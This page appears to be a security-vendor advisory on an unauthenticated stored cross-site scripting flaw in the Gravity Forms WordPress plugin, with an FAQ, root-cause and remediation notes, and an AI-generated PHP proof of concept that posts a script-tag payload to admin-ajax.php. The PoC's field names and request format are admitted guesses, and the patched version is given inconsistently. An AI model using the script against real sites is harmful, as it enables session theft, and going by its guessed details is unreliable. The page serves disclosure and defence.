What is CVE-2026-5110?

CVE-2026-5110 is a high-severity vulnerability in the Gravity Forms plugin for WordPress, affecting versions up to and including 2.10.0. It allows unauthenticated stored cross-site scripting (XSS) through the SingleProduct field when used inside a Repeater field.

How does the vulnerability work?

The vulnerability arises from insufficient input validation and output escaping in the SingleProduct field. An attacker can inject malicious HTML or JavaScript into the product name field, which is stored in the database and executed when an administrator views the entry.

Who is affected by this vulnerability?

Any WordPress site using the Gravity Forms plugin version 2.10.0 or earlier is affected. Administrators should check their plugin version in the WordPress admin dashboard under Plugins.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, navigate to the Plugins section in your WordPress admin area and check the version of Gravity Forms installed. If it is 2.10.0 or earlier, your site is at risk.

What is the recommended fix for this vulnerability?

The recommended fix is to update the Gravity Forms plugin to version 2.10.1 or later, which addresses the vulnerability by implementing proper input validation and output escaping for the affected fields.

How can I mitigate the risk if I cannot update immediately?

As a temporary measure, you can block form submissions that contain script tags in the product name subfield. This can help prevent exploitation until you are able to update the plugin.

What does a CVSS score of 7.2 indicate?

A CVSS score of 7.2 indicates a high severity vulnerability. This means that the vulnerability can be exploited easily, does not require authentication, and poses significant risks to the confidentiality and integrity of the site.

What are the practical risks of this vulnerability?

If exploited, this vulnerability allows an attacker to inject arbitrary JavaScript into the admin interface, potentially leading to theft of admin session cookies, site defacement, or unauthorized actions under the admin’s context.

How does the proof of concept demonstrate the vulnerability?

The proof of concept shows how an attacker can submit a Gravity Forms entry with a malicious payload in the product name field. It outlines the steps to craft the payload and submit it, demonstrating the exploit’s feasibility.

What is the root cause of this vulnerability?

The root cause is insufficient input validation and output escaping in the handling of the SingleProduct field within Repeater fields. The validation mechanism fails to check the product name field, allowing for tampering.

What should I do if I have further questions about this vulnerability?

For further questions, you can consult the official Gravity Forms documentation, security forums, or reach out to security professionals for guidance on best practices and remediation strategies.

Where can I find more information about CVE-2026-5110?

More information about CVE-2026-5110 can be found on the National Vulnerability Database (NVD) or security analysis websites like Atomic Edge, which provide detailed insights and recommendations.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 4, 2026

CVE-2026-5110: Gravity Forms <= 2.10.0 – Unauthenticated Stored Cross-Site Scripting via Single Product Field Inside Repeater (gravityforms)

CVE ID CVE-2026-5110

Plugin gravityforms

Severity High (CVSS 7.2)

CWE 79

Vulnerable Version 2.10.0

Patched Version —

Disclosed April 30, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-5110 (metadata-based): This vulnerability allows unauthenticated stored cross-site scripting (XSS) in the Gravity Forms plugin for WordPress, affecting versions up to and including 2.10.0. The flaw resides in how the SingleProduct field is handled when nested inside a Repeater field. An attacker can inject arbitrary HTML and JavaScript into the product name field, which gets stored in the database and executes when an administrator views the entry in the WordPress admin area. The CVSS score of 7.2 (high severity) reflects the network-based, low-complexity attack that requires no authentication and impacts confidentiality and integrity at a limited scope.

Root Cause: The description confirms that the issue stems from insufficient input validation and output escaping in the SingleProduct field’s handling within Repeater contexts. The validate_subfield() method calls the field’s validate() method, which only validates the quantity subfield, not the product name. This allows an attacker to tamper with the product name field (input .1) without triggering the failed_state_validation() mechanism. Additionally, sanitize_entry_value() returns raw values when HTML is not expected for the field type, meaning the malicious input is saved unsanitized. Finally, get_value_entry_detail() outputs the product name without escaping. Atomic Edge analysis notes that these conclusions are directly extracted from the CVE description; no source code diff was available for independent verification, but the described pattern is consistent with common Gravity Forms field handling logic and the CWE-79 classification.

Exploitation: An unauthenticated attacker can exploit this by submitting a Gravity Forms entry that includes a Repeater field containing a SingleProduct field. The attacker crafts the product name subfield (likely a form input named something like input_1.1 or similar) with a malicious payload, such as alert(document.cookie). The form submission is sent to the standard WordPress endpoint for Gravity Forms (typically via AJAX or direct POST to /wp-admin/admin-ajax.php with action=gf_submit or similar). Because the validation flow fails to sanitize the product name, the payload is stored in the database. When an administrator later views the entry in the WordPress admin area (wp-admin/admin.php?page=gf_entries), the payload executes in the admin’s browser. The attack requires no authentication, making it accessible to any visitor.

Remediation: The patched version (2.10.1) likely addresses this by adding proper input validation and output escaping for the SingleProduct field’s product name, especially when nested within Repeater fields. Specifically, the fix probably involves (1) implementing validation for the product name subfield in the SingleProduct field’s validate() method to reject or sanitize HTML, (2) updating sanitize_entry_value() to escape output when HTML is not expected, and (3) adding escaping in get_value_entry_detail() for the product name. Atomic Edge analysis recommends that administrators update to version 2.10.1 immediately. As a virtual patch, blocking form submissions containing script tags in the product name subfield can mitigate the risk.

Impact: Successful exploitation allows an unauthenticated attacker to inject arbitrary JavaScript into the admin interface. This can lead to theft of admin session cookies, redirection to malicious sites, defacement, or execution of actions under the admin’s context (e.g., creating new admin users, modifying site content). The CVSS scope change (C) indicates the attack affects resources beyond the original vulnerable component, such as the broader WordPress admin session. While the CIA impacts are limited (L:L), the combination of unauthenticated access and stored XSS in the admin panel poses a significant security risk to WordPress sites using the vulnerable plugin.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-5110 - Gravity Forms <= 2.10.0 - Unauthenticated Stored XSS via SingleProduct Field Inside Repeater

// Configuration
$target_url = 'http://example.com'; // Replace with target WordPress site URL

// Step 1: Get the form ID and nonce (if required) by fetching the page containing the form
// For simplicity, we assume the form ID is 1 and the nonce is not required (unauthenticated submission)
// In reality, an attacker may need to inspect the form HTML to find the form ID and field names.

// Step 2: Craft the malicious payload
// The product name field (likely input_1.1 or similar) is the injection point
$malicious_payload = '<script>alert("XSS")</script>';

// Step 3: Build the POST data for the Gravity Forms submission
// This structure is based on typical Gravity Forms AJAX submissions.
// The form ID is 1, the Repeater field ID is 2, and the SingleProduct field within it has ID 3.
// The product name subfield is likely input_1.3.1 (form ID 1, field ID 3, subfield index 1).
$post_data = array(
    'action' => 'gf_submit',
    'gform_submit' => '1',
    'input_1' => 'Test Entry',
    'input_2' => '{"inputs":{"3":{"0":"Product A","1":"' . $malicious_payload . '"}}}', // Repeater data with malicious product name
    'gform_ajax' => '1',
    'gform_unique_id' => '',
    'gform_random_id' => '',
);

// Step 4: Send the POST request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 5: Check if the submission was successful
if ($http_code == 200) {
    // The payload is now stored. An attacker would need to lure an admin to view the entry.
    // The success message is parsed from the JSON response; if 'is_valid' is true, it worked.
    $decoded = json_decode($response, true);
    if (isset($decoded['is_valid']) && $decoded['is_valid']) {
        echo "Payload submitted successfully. Entry ID: " . $decoded['entry_id'] . "n";
    } else {
        echo "Submission may have failed. Response:n$responsen";
    }
} else {
    echo "HTTP error: $http_coden";
}

?>

Frequently Asked Questions

What is CVE-2026-5110?
Understanding the vulnerability
CVE-2026-5110 is a high-severity vulnerability in the Gravity Forms plugin for WordPress, affecting versions up to and including 2.10.0. It allows unauthenticated stored cross-site scripting (XSS) through the SingleProduct field when used inside a Repeater field.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input validation and output escaping in the SingleProduct field. An attacker can inject malicious HTML or JavaScript into the product name field, which is stored in the database and executed when an administrator views the entry.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Gravity Forms plugin version 2.10.0 or earlier is affected. Administrators should check their plugin version in the WordPress admin dashboard under Plugins.
How can I check if my site is vulnerable?
Verifying plugin version
To determine if your site is vulnerable, navigate to the Plugins section in your WordPress admin area and check the version of Gravity Forms installed. If it is 2.10.0 or earlier, your site is at risk.
What is the recommended fix for this vulnerability?
Updating the plugin
The recommended fix is to update the Gravity Forms plugin to version 2.10.1 or later, which addresses the vulnerability by implementing proper input validation and output escaping for the affected fields.
How can I mitigate the risk if I cannot update immediately?
Temporary protective measures
As a temporary measure, you can block form submissions that contain script tags in the product name subfield. This can help prevent exploitation until you are able to update the plugin.
What does a CVSS score of 7.2 indicate?
Understanding severity levels
A CVSS score of 7.2 indicates a high severity vulnerability. This means that the vulnerability can be exploited easily, does not require authentication, and poses significant risks to the confidentiality and integrity of the site.
What are the practical risks of this vulnerability?
Potential impacts on your site
If exploited, this vulnerability allows an attacker to inject arbitrary JavaScript into the admin interface, potentially leading to theft of admin session cookies, site defacement, or unauthorized actions under the admin’s context.
How does the proof of concept demonstrate the vulnerability?
Technical illustration of the exploit
The proof of concept shows how an attacker can submit a Gravity Forms entry with a malicious payload in the product name field. It outlines the steps to craft the payload and submit it, demonstrating the exploit’s feasibility.
What is the root cause of this vulnerability?
Identifying the underlying issue
The root cause is insufficient input validation and output escaping in the handling of the SingleProduct field within Repeater fields. The validation mechanism fails to check the product name field, allowing for tampering.
What should I do if I have further questions about this vulnerability?
Seeking additional information
For further questions, you can consult the official Gravity Forms documentation, security forums, or reach out to security professionals for guidance on best practices and remediation strategies.
Where can I find more information about CVE-2026-5110?
Additional resources
More information about CVE-2026-5110 can be found on the National Vulnerability Database (NVD) or security analysis websites like Atomic Edge, which provide detailed insights and recommendations.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations